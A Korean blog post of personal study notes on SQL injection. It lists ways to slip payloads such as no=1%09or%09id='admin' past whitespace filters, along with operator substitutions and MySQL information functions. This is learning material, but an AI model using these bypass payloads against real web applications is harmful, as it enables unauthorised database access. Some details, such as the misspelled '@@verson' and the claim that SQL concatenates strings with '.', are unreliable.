EASY7

SQL injection 본문

보안 공부/취약점 실습

SQL injection

E.asiest 2019. 8. 4. 14:07

#SQL Injection 공격시 공백 문자 필터링시 우회 방법

 

아스키코드 단어에서 hex코드로 고쳐보기

Tab : %09

예시) no=1%09or%09id='admin'

 

Line Feed (\n): %0a

예시) no=1%0aor%0aid='admin'

 

3. Carrage Return(\r)새 줄 시작 : %0d

예시) no=1%0dor%0did='admin'

 

주석 : /**/

  - no=1/**/or/**/id='admin'

 

괄호 : ()

  - no=(1)or(id='admin')

 

더하기 : +

  - no=1+or+id='admin'

 

 

데이터베이스의 함수

 

database() : db명을 알려주는 함수

 

user() : 현재 사용자의 아이디

 

system_user() : 최고 권한 사용자의 아이디

 

@@verson : DB 서버의 버전

 

@@datadir : DB 서버가 존재하는 디렉터리 

 

우회기법

= like, between, in
or ||
and  %26%26, &&
   
   
   
   
   
   
   

 

유용한 함수

substr(문자, 시작번호, 갯수)

left(문자, 갯수)

mid(문자, 시작번호, 갯수)

 

sql에서는 문자열과 문자열을 이을 때 '.'으로 한다.

 

http://coashanee5.blogspot.com/2017/02/sql.html

'보안 공부 > 취약점 실습' 카테고리의 다른 글

Metasploit 무차별 대입 공격  (0) 2019.08.05
Metasploit Scanning  (0) 2019.08.05
SQL Map  (0) 2019.08.04
Bash Shell Shock 취약점  (0) 2019.08.03
Exploit Database 사용법  (0) 2019.08.03
Comments